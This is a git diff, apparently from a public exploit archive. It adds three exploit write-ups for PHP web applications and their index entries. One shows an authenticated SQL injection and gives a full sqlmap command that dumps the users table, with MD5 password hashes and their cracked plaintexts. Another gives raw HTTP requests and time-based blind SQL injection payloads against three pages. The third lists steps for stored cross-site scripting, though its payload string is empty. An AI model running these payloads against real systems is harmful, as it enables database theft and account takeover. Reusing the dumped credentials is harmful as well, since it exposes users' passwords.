diff --git a/exploits/php/webapps/50218.txt b/exploits/php/webapps/50218.txt new file mode 100644 index 000000000..a6e3d2d14 --- /dev/null +++ b/exploits/php/webapps/50218.txt @@ -0,0 +1,31 @@ +# Exploit Title: Online Traffic Offense Management System 1.0 - 'id' SQL Injection (Authenticated) +# Date: 19/08/2021 +# Exploit Author: Justin White +# Vendor Homepage: https://www.sourcecodester.com +# Software Link: https://www.sourcecodester.com/php/14909/online-traffic-offense-management-system-php-free-source-code.html +# Version: 1.0 +# Testeted on: Linux (Ubuntu 20.04) using LAMPP + +## SQL Injection + +# Vulnerable page +http://localhost/traffic_offense/admin/?page=drivers/manage_driver&id= + +#Vulnerable paramater +The id paramater is Vulnerable to sqli + +#POC +going to http://localhost/traffic_offense/admin/?page=drivers/manage_driver&id=4'-- will throw errors on the web page. + +Notice: Trying to get property 'num_rows' of non-object in /opt/lampp/htdocs/traffic_offense/admin/drivers/manage_driver.php on line 5 +Notice: Trying to get property 'num_rows' of non-object in /opt/lampp/htdocs/traffic_offense/admin/drivers/manage_driver.php on line 10 + +Using sqlmap with dump database +sqlmap -u "http://localhost/traffic_offense/admin/?page=drivers/manage_driver&id=4" --cookie="PHPSESSIONID=83ccd78474298cd9c3ad3def1f79f2ac" -D traffic_offense_db -T users --dump + ++----+------+-------------------------------+----------+---------------------------------------------+----------+--------------+---------------------+------------+---------------------+ +| id | type | avatar | lastname | password | username | firstname | date_added | last_login | date_updated | ++----+------+-------------------------------+----------+---------------------------------------------+----------+--------------+---------------------+------------+---------------------+ +| 1 | 1 | uploads/1624240500_avatar.png | Admin | 0192023a7bbd73250516f069df18b500 (admin123) | admin | Adminstrator | 2021-01-20 14:02:37 | NULL | 2021-06-21 09:55:07 | +| 9 | 2 | uploads/1629336240_avatar.jpg | Smith | 202cb962ac59075b964b07152d234b70 (123) | jsmith1 | John | 2021-08-19 09:24:25 | NULL | 2021-08-19 19:14:58 | ++----+------+-------------------------------+----------+---------------------------------------------+----------+--------------+---------------------+------------+---------------------+ \ No newline at end of file diff --git a/exploits/php/webapps/50219.txt b/exploits/php/webapps/50219.txt new file mode 100644 index 000000000..1c72d1198 --- /dev/null +++ b/exploits/php/webapps/50219.txt @@ -0,0 +1,95 @@ +# Exploit Title: Laundry Booking Management System 1.0 - 'Multiple' SQL Injection +# Date: 2021-08-19 +# Exploit Author: Azumah Foresight Xorlali +# Vendor Homepage: https://www.sourcecodester.com/php/14400/laundry-booking-management-system-php-source-code.html +# Software Link: https://www.sourcecodester.com/download-code?nid=14400&title=Laundry+Booking+Management+System+in+PHP+with+Free+Source+Code +# Version: Version 1.0 +# Category: Web Application +# Tested on: Kali Linux + +Description: +Laundry Booking Management System 1.0 application is vulnerable to SQL +injection via the "id" parameter, which was not properly checked on the +[edit_user.php,edit_customer.php,edit_order.php] page. + +#Vulnerable Request when logged in as a user with Supervisor or Manager: +POST /laundry_sourcecode/laundry_sourcecode/edit_user.php?id=7 HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 +Firefox/68.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: +http://localhost/laundry_sourcecode/laundry_sourcecode/edit_user.php?id=7 +Content-Type: multipart/form-data; +boundary=---------------------------851226474159708868105526498 +Content-Length: 1408 +Connection: close +Cookie: PHPSESSID=dih37knpkeb9hc1qtk56godb5r +Upgrade-Insecure-Requests: 1 + + +--- +Parameter: id (GET) + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: id=7' AND (SELECT 5999 FROM (SELECT(SLEEP(5)))BOpa) AND +'voSh'='voSh +--- + +----------------------------------------------------------------------------------------------------------------------- + + +#Vulnerable Request when logged in as Admin: +POST /laundry_sourcecode/laundry_sourcecode/edit_customer.php?id=1 HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 +Firefox/68.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: +http://localhost/laundry_sourcecode/laundry_sourcecode/edit_customer.php?id=1 +Content-Type: multipart/form-data; +boundary=---------------------------17781030011592905058578147050 +Content-Length: 767 +Connection: close +Cookie: PHPSESSID=dih37knpkeb9hc1qtk56godb5r +Upgrade-Insecure-Requests: 1 + +--- +Parameter: id (GET) + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: id=1' AND (SELECT 6874 FROM (SELECT(SLEEP(5)))ZCjC) AND +'GIau'='GIau +--- + +----------------------------------------------------------------------------------------------------------------------- + +#Vulnerable Request when logged in a Admin: +POST /laundry_sourcecode/laundry_sourcecode/edit_order.php?id=18 HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 +Firefox/68.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: +http://localhost/laundry_sourcecode/laundry_sourcecode/edit_order.php?id=18 +Content-Type: multipart/form-data; +boundary=---------------------------167059892515401580571429373524 +Content-Length: 886 +Connection: close +Cookie: PHPSESSID=dih37knpkeb9hc1qtk56godb5r +Upgrade-Insecure-Requests: 1 + + +--- +Parameter: id (GET) + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: id=18' AND (SELECT 8201 FROM (SELECT(SLEEP(5)))odDG) AND +'wCli'='wCli +--- \ No newline at end of file diff --git a/exploits/php/webapps/50220.txt b/exploits/php/webapps/50220.txt new file mode 100644 index 000000000..31df17d9a --- /dev/null +++ b/exploits/php/webapps/50220.txt @@ -0,0 +1,13 @@ +# Exploit Title: Laundry Booking Management System 1.0 - 'Multiple' Stored Cross-Site Scripting (XSS) +# Date: 2021-08-19 +# Exploit Author: Azumah Foresight Xorlali +# Vendor Homepage: https://www.sourcecodester.com/php/14400/laundry-booking-management-system-php-source-code.html +# Software Link: https://www.sourcecodester.com/download-code?nid=14400&title=Laundry+Booking+Management+System+in+PHP+with+Free+Source+Code +# Version: Version 1.0 +# Category: Web Application +# Tested on: Kali Linux + +Step1: Log in to the application with any valid user credentials. +Step2: Select User Management and click add new user. +Step3: Fill the required details and type "" in the address box or you can it on a notepad and paste it into the firstname and lastname since it doesn't you to type special characters into those fields +Step 4:Click on Submit \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 01e8367ba..19b801440 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -38017,6 +38017,7 @@ id,file,description,date,author,type,platform,port 37352,exploits/php/webapps/37352.txt,"Ignite Solutions CMS - 'car-details.php' SQL Injection",2012-06-03,Am!r,webapps,php, 37353,exploits/php/webapps/37353.php,"WordPress Plugin Nmedia WordPress Member Conversation 1.35.0 - 'doupload.php' Arbitrary File Upload",2015-06-05,"Sammy FORGIT",webapps,php, 37248,exploits/php/webapps/37248.txt,"Milw0rm Clone Script 1.0 - 'related.php?program' Blind SQL Injection",2015-06-09,Pancaker,webapps,php, +50219,exploits/php/webapps/50219.txt,"Laundry Booking Management System 1.0 - 'Multiple' SQL Injection",2021-08-20,"Azumah Foresight Xorlali",webapps,php, 37237,exploits/hardware/webapps/37237.txt,"D-Link DSL-2780B DLink_1.01.14 - Remote DNS Change",2015-06-08,"Todor Donev",webapps,hardware, 37238,exploits/hardware/webapps/37238.txt,"TP-Link TD-W8950ND ADSL2+ - Remote DNS Change",2015-06-08,"Todor Donev",webapps,hardware, 37240,exploits/hardware/webapps/37240.txt,"D-Link DSL-2730B AU_2.01 - Authentication Bypass DNS Change",2015-06-08,"Todor Donev",webapps,hardware, @@ -44093,6 +44094,7 @@ id,file,description,date,author,type,platform,port 49849,exploits/php/webapps/49849.txt,"PHP Timeclock 1.04 - Time and Boolean Based Blind SQL Injection",2021-05-07,"Tyler Butler",webapps,php, 49853,exploits/php/webapps/49853.txt,"PHP Timeclock 1.04 - 'Multiple' Cross Site Scripting (XSS)",2021-05-10,"Tyler Butler",webapps,php, 49854,exploits/php/webapps/49854.txt,"Human Resource Information System 0.1 - 'First Name' Persistent Cross-Site Scripting (Authenticated)",2021-05-10,"Reza Afsahi",webapps,php, +50218,exploits/php/webapps/50218.txt,"Online Traffic Offense Management System 1.0 - 'id' SQL Injection (Authenticated)",2021-08-20,"Justin White",webapps,php, 49856,exploits/php/webapps/49856.py,"Microweber CMS 1.1.20 - Remote Code Execution (Authenticated)",2021-05-10,sl1nki,webapps,php, 49859,exploits/multiple/webapps/49859.txt,"Chevereto 3.17.1 - Cross Site Scripting (Stored)",2021-05-12,"Akıner Kısa",webapps,multiple, 49860,exploits/php/webapps/49860.txt,"Dental Clinic Appointment Reservation System 1.0 - Authentication Bypass (SQLi)",2021-05-13,"Mesut Cetin",webapps,php, @@ -44344,3 +44346,4 @@ id,file,description,date,author,type,platform,port 50214,exploits/php/webapps/50214.py,"Simple Image Gallery 1.0 - Remote Code Execution (RCE) (Unauthenticated)",2021-08-18,Tagoletta,webapps,php, 50215,exploits/php/webapps/50215.txt,"COVID19 Testing Management System 1.0 - 'Multiple' SQL Injections",2021-08-18,"Halit AKAYDIN",webapps,php, 50217,exploits/php/webapps/50217.txt,"Charity Management System CMS 1.0 - Multiple Vulnerabilities",2021-08-19,"Davide Taraschi",webapps,php, +50220,exploits/php/webapps/50220.txt,"Laundry Booking Management System 1.0 - 'Multiple' Stored Cross-Site Scripting (XSS)",2021-08-20,"Azumah Foresight Xorlali",webapps,php,